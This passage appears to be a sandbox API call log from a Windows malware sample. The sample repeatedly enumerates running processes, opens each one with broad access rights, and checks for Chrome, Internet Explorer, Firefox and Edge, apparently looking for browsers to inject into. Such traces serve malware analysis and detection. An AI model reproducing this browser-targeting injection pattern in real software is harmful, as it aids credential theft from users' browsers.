	[0253.382] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0xa8f4
	[0253.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.382] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.382] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.382] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.383] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.383] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.383] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.383] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.384] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0xa8f8
	[0253.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.384] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.384] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.384] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.385] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.385] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.385] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.385] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0253.386] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbb4) returned 0xa8fc
	[0253.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.386] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0253.386] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.386] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.387] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0253.387] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.387] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.387] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0253.388] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xbc0) returned 0xa900
	[0253.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.388] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.388] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.388] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.389] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.389] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.389] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.389] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x950, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xbb4, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0253.390] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x950) returned 0xa904
	[0253.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.390] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0253.390] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.390] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.391] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0253.391] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.391] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.391] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x748, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.392] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x748) returned 0xa908
	[0253.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.392] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.392] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.392] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.393] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.393] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.393] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.393] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0253.394] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd70) returned 0xa90c
	[0253.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.394] StrStrIA (lpFirst="cmd.exe", lpSrch="chrome.exe") returned 0x0
	[0253.394] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.394] StrStrIA (lpFirst="cmd.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.395] StrStrIA (lpFirst="cmd.exe", lpSrch="firefox.exe") returned 0x0
	[0253.395] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.395] StrStrIA (lpFirst="cmd.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.395] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xd6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0253.396] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xd6c) returned 0xa910
	[0253.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.396] StrStrIA (lpFirst="conhost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.396] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.396] StrStrIA (lpFirst="conhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.397] StrStrIA (lpFirst="conhost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.397] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.397] StrStrIA (lpFirst="conhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.397] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 1
	[0253.398] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xed4) returned 0xa914
	[0253.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.398] StrStrIA (lpFirst="net.exe", lpSrch="chrome.exe") returned 0x0
	[0253.398] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.398] StrStrIA (lpFirst="net.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.399] StrStrIA (lpFirst="net.exe", lpSrch="firefox.exe") returned 0x0
	[0253.399] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.399] StrStrIA (lpFirst="net.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.399] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xd70, pcPriClassBase=8, dwFlags=0x0, szExeFile="net.exe")) returned 0
	[0253.400] CloseHandle (hObject=0x4fd0) returned 1
	[0253.400] Sleep (dwMilliseconds=0x64) 
	[0253.501] GetCurrentProcessId () returned 0x110
	[0253.501] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0253.505] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0253.506] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0253.508] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0253.509] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0xa918
	[0253.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.509] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0253.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.510] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.510] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0253.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.511] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.511] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0253.513] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0xa91c
	[0253.513] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.513] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0253.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.514] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.514] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0253.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.515] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.515] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0253.517] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0xa920
	[0253.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.517] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0253.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.518] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.518] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0253.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.519] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.519] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0253.520] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0xa924
	[0253.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.520] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0253.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.520] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.521] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0253.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.521] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.521] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0253.522] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0xa928
	[0253.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.522] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0253.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.523] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.523] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0253.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.523] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.524] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0253.524] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0xa92c
	[0253.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.525] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0253.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.525] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.525] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0253.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.526] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.526] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0253.527] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0xa930
	[0253.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.527] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0253.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.527] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.527] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0253.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.528] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.528] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0253.529] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0xa934
	[0253.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.529] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0253.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.529] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.529] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0253.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.530] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.530] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.531] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0xa938
	[0253.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.531] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.531] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.531] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.532] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.532] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.533] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xa93c
	[0253.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.533] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.533] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.534] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.534] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.534] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.535] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xa940
	[0253.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.535] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.536] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.536] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.537] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.537] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.538] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xa944
	[0253.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.538] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.539] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.539] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.540] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.540] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.541] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xa948
	[0253.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.542] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.542] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.542] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.543] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.543] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.544] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xa94c
	[0253.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.544] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.545] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.545] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.545] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.546] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0253.546] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xa950
	[0253.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.546] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0253.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.547] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0253.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.548] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0253.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0253.548] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0253.548] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
